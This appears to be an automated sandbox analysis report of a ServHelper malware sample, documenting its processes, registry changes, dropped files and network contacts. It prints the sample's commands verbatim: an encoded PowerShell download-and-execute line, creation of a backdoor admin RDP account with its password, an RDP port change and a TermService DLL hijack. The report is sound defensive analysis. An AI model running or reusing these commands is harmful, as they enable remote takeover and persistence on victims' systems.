Analysis Overview
SHA256
a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41
Threat Level: Known bad
The file a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41 was found to be: Known bad.
Malicious Activity Summary
ServHelper
Grants admin privileges
Possible privilege escalation attempt
Blocklisted process makes network request
Sets DLL path for service in the registry
Modifies RDP port number used by Windows
VMProtect packed file
Loads dropped DLL
Modifies file permissions
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Suspicious behavior: LoadsDriver
Detects videocard installed
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-10 13:01
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-10 13:01
Reported
2024-04-10 13:04
Platform
win7-20240319-en
Max time kernel
134s
Max time network
131s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2TSWOHYLZ0I28JSUHL34.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0041aa4c478bda01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe
"C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fk1wjuse.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76E6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC76E5.tmp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc Ghasar4f5 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8AMRDZfq /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 8AMRDZfq /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 8AMRDZfq /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8AMRDZfq
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 8AMRDZfq
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 8AMRDZfq
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | dfsrakizimoy34ggf.xyz | udp |
Files
memory/2144-0-0x00000000001D0000-0x0000000001027000-memory.dmp
memory/2144-6-0x000007FEF5C20000-0x000007FEF660C000-memory.dmp
memory/2144-5-0x0000000041DA0000-0x00000000421A4000-memory.dmp
memory/2144-7-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/2144-8-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/2144-9-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/2692-16-0x000000001B1A0000-0x000000001B482000-memory.dmp
memory/2692-17-0x0000000002290000-0x0000000002298000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 28d9755addec05c0b24cca50dfe3a92b |
| SHA1 | 7d3156f11c7a7fb60d29809caf93101de2681aa3 |
| SHA256 | abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9 |
| SHA512 | 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42 |
memory/2692-19-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2692-20-0x00000000024C0000-0x0000000002540000-memory.dmp
memory/2692-21-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2144-22-0x000007FEF5C20000-0x000007FEF660C000-memory.dmp
memory/2692-23-0x00000000024C0000-0x0000000002540000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fk1wjuse.cmdline
| MD5 | 093a758164c0fec72d3d3fcb5bb78871 |
| SHA1 | f53386aa0e6d210e81b23ad94ada22e45d6c3b1c |
| SHA256 | a9330fccd68f021eaa4dc5ac6c37ed8a2882921c4e1eb563162d94720f6fe287 |
| SHA512 | 73fddd766d191f39e89751db2c89210a05fc566754f1bef6d7d34aa742d5b6593adbc9c98184fe402a6bb3d9647e05c1b78d14160a78f5c51cd2c64f119450ca |
\??\c:\Users\Admin\AppData\Local\Temp\fk1wjuse.0.cs
| MD5 | 9f8ab7eb0ab21443a2fe06dab341510e |
| SHA1 | 2b88b3116a79e48bab7114e18c9b9674e8a52165 |
| SHA256 | e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9 |
| SHA512 | 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b |
\??\c:\Users\Admin\AppData\Local\Temp\CSC76E5.tmp
| MD5 | d04ce6399403426a07fbf75efb7e4485 |
| SHA1 | e3e62eb3aff018484ae0117bfce95be453857eb0 |
| SHA256 | 462b4c23cafc039045fe9f3f91252a9cb9b72e2a8277602d3183d75cc8ec7f31 |
| SHA512 | 6f8c936abd0b4dd87f574ebf7f33ec14f8b703b02a026a6ede87e90894b26ff1d569611fd085e2858bc706eb747ae26f34cd51a97dbbaf2d76da87a08c2f27e6 |
C:\Users\Admin\AppData\Local\Temp\RES76E6.tmp
| MD5 | 1aba493d5f329036cccabdf1cb61e5eb |
| SHA1 | 17fc0e1d13538116eff139b0506f768a293f68fe |
| SHA256 | a08406236e75c4ce3f84848ce0ac568c2bdb2e56e82045d4fcfff273670d7915 |
| SHA512 | baa269eca08386ceb5b281c2abe86d289d9ba87c4fc9194cfb82b20943ff58d3e1396ff116c2e7c9fe5e78be99349577a55f8ee087654409e25186a8b0985c28 |
C:\Users\Admin\AppData\Local\Temp\fk1wjuse.dll
| MD5 | 82060a8938f0a4be755ab7a22b178644 |
| SHA1 | e1530c22866456318a8d6da2daec181a046fb504 |
| SHA256 | 61d5d7f27b25abc93229a4835a9c1c724b4a415311a81203eaa229cf2cf7bbbb |
| SHA512 | 2c6e0bc72891c06d9270b2e4efe8b2305a560b7534d1981fe956096c5741f0a70b6da25da58cca3a05d9a86bf180907866c5e9b3a8c151f8b823f27411e18416 |
memory/2692-37-0x0000000002770000-0x0000000002778000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\fk1wjuse.pdb
| MD5 | 1a0122c2a9d312dc4f88578562b17e62 |
| SHA1 | 4afe20cf5e226d54e7565b531942e22f082c053f |
| SHA256 | e91798092d892cf3e3b074e349ca876b40b85077edd1e3d35abecdd5e6103f34 |
| SHA512 | 75ff3821d71ce2663abe9e1eda771f56e60e751dc53166ad8bf983a16bc395ec04c95d8e9b3da671b05b431cb172c6e6c1ec6b8c336b7780058e3fa0a86e1537 |
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
| MD5 | 5db5ffa607b5b5ca17bfd6fb78403660 |
| SHA1 | 1e793958cb1dd1dc99da4a50beaa2945561b7a16 |
| SHA256 | 1fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89 |
| SHA512 | 3d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43 |
memory/2144-41-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/2692-42-0x00000000024C0000-0x0000000002540000-memory.dmp
memory/2692-43-0x000000001B660000-0x000000001B692000-memory.dmp
memory/2692-44-0x000000001B660000-0x000000001B692000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c9c76eaa43438310e9f1a80ea763d679 |
| SHA1 | 22daee73cee81c461fca9e0f56900eeb68b38afa |
| SHA256 | f3fe1634ba2e411e2ff585afed9ae90e47dc7c9952a0e182d029bc1d8346bab3 |
| SHA512 | 4328f5fa000b659597ea143cf8ce1d18ae0279c9be2e8e138be1916c4364f2db4369887cee3f3fc46363c0df94bc6adb016a5b09f2566f1c3b61d4cb4d3c877f |
memory/2144-50-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/624-51-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/624-52-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/624-53-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/624-54-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/624-55-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/624-56-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2144-57-0x0000000028CF0000-0x0000000028D70000-memory.dmp
memory/624-58-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/624-60-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2860-65-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2860-66-0x0000000002470000-0x00000000024F0000-memory.dmp
memory/2860-67-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2860-68-0x0000000002470000-0x00000000024F0000-memory.dmp
memory/2860-69-0x0000000002470000-0x00000000024F0000-memory.dmp
memory/2860-70-0x0000000002470000-0x00000000024F0000-memory.dmp
memory/2860-71-0x0000000002470000-0x00000000024F0000-memory.dmp
memory/2860-72-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/1624-78-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/1624-79-0x0000000002900000-0x0000000002980000-memory.dmp
memory/1624-80-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/1624-81-0x0000000002900000-0x0000000002980000-memory.dmp
memory/1624-82-0x0000000002900000-0x0000000002980000-memory.dmp
memory/2692-83-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/1624-84-0x0000000002900000-0x0000000002980000-memory.dmp
memory/1624-85-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2692-86-0x00000000024C0000-0x0000000002540000-memory.dmp
memory/2692-87-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2692-88-0x00000000024C0000-0x0000000002540000-memory.dmp
memory/2692-89-0x00000000024C0000-0x0000000002540000-memory.dmp
memory/2692-91-0x00000000024C0000-0x0000000002540000-memory.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
\Windows\Branding\mediasrv.png
| MD5 | 96e498a3833f52ae46bcfdc391f73cf7 |
| SHA1 | ecaf72b46cf1cb074bde2914963bb1e61450ca95 |
| SHA256 | 21a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b |
| SHA512 | 9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540 |
\Windows\Branding\mediasvc.png
| MD5 | 2ee3d03bb1f8bd257235fc70e92b17e1 |
| SHA1 | c36482b8f8229578dec1cc687aaf53084cb6d05e |
| SHA256 | b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0 |
| SHA512 | 39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2464-114-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2464-116-0x00000000011A0000-0x0000000001220000-memory.dmp
memory/2464-115-0x00000000011A0000-0x0000000001220000-memory.dmp
memory/2464-117-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2464-118-0x00000000011A0000-0x0000000001220000-memory.dmp
memory/2464-119-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp
memory/2464-120-0x00000000011A0000-0x0000000001220000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-10 13:01
Reported
2024-04-10 13:04
Platform
win10v2004-20240226-en
Max time kernel
143s
Max time network
156s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
